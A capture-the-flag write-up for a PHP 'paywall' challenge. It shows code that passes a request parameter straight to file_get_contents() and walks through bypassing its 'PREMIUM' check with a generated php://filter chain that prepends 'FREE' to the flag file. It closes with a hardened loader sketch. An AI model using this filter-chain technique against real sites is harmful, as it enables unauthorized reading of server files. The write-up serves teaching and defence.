February 21, 2023


  • PHP, file_get_contents() function vulnerability
  • PHP wrappers, e.g. php://filter
  • PHP filter chain generator (tool)

Given info

  • paywall.tar.gz was given; it contains:
        Dockerfile
        index.php
        .htaccess
        flag
        hello-world
  • The file /src/articles/flag contains: PREMIUM - idek{REDACTED}
  • The goal is to read the flag file

	if (isset($_GET['p'])) {
		// 'p' is passed to file_get_contents() unfiltered, so stream wrappers such as php:// are accepted
		$article_content = file_get_contents($_GET['p'], 1);

		if (strpos($article_content, 'PREMIUM') === 0) {
			die('Thank you for your interest in The idek Times, but this article is only for premium users!'); // TODO: implement subscriptions
		}
		else if (strpos($article_content, 'FREE') === 0) {
			echo "<article>$article_content</article>";
		}
		else {
			die('nothing here');
		}
	}
  • The flag file starts with 'PREMIUM', so it cannot be read directly
  • Only files whose content starts with 'FREE' are displayed


  1. Read the flag file

Read the file using the PHP filter chain generator

  • The service reads and parses data with the file_get_contents function
  • So a PHP wrapper (php://filter) can be used in the p parameter
  • In this challenge, if "FREE" is added in front of the file data, the content passes the 'FREE' check and the file is displayed
  • A value can be prepended to the data with the PHP filter chain generator
# python3 php_filter_chain_generator.py --help
usage: php_filter_chain_generator.py [-h] [--chain CHAIN]
                                     [--rawbase64 RAWBASE64]

PHP filter chain generator.

optional arguments:
  -h, --help            show this help message and exit
  --chain CHAIN         Content you want to generate. (you will maybe need to
                        pad with spaces for your payload to work)
  --rawbase64 RAWBASE64
                        The base64 value you want to test, the chain will be
                        printed as base64 by PHP, useful to debug.
  • Change file_to_use in the generator script
# No need to guess a valid filename anymore
file_to_use = "flag"
  • Then generate a PHP filter chain that prepends "FREE"
# python3 php_filter_chain_generator.py --chain "FREE  "
[+] The following gadget chain will generate the following code : FREE   (base64 value: RlJFRSAg)
  • Pass the generated chain to the web service
  • The response then contains the FLAG
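
The bypass works because the request chooses the stream that file_get_contents() opens, so the 'PREMIUM'/'FREE' check runs on data the client can reshape. A hardened loader is sketched below as an added example, not part of the challenge source; ARTICLE_DIR and load_article() are hypothetical names, and the articles directory is assumed to sit next to index.php.

```php
<?php
// Added example: hardened article loader (hypothetical names, not challenge code).
// Assumption: articles live in an "articles" directory next to this script.
const ARTICLE_DIR = __DIR__ . '/articles';

function load_article(string $name): ?string
{
    // Accept a bare file name only: no scheme ("php://"), no path separators.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }

    // Resolve symlinks and confirm the target is still inside ARTICLE_DIR.
    $base = realpath(ARTICLE_DIR);
    $path = realpath(ARTICLE_DIR . '/' . $name);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0
        || !is_file($path)) {
        return null;
    }

    // A resolved local path: no stream wrapper or filter is ever evaluated.
    $content = file_get_contents($path);
    return $content === false ? null : $content;
}

$p = $_GET['p'] ?? null;
$content = is_string($p) ? load_article($p) : null;

if ($content === null) {
    http_response_code(404);
    die('nothing here');
}
if (strpos($content, 'FREE') === 0) {
    // Encode on output so article text cannot inject markup.
    echo '<article>' . htmlspecialchars($content, ENT_QUOTES, 'UTF-8') . '</article>';
} else {
    // Default deny: anything not explicitly marked FREE is withheld.
    die('Thank you for your interest in The idek Times, but this article is only for premium users!');
}
```

With this loader a php://filter value in p fails the name check before any file is opened, and the prefix test only ever sees the bytes stored on disk.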
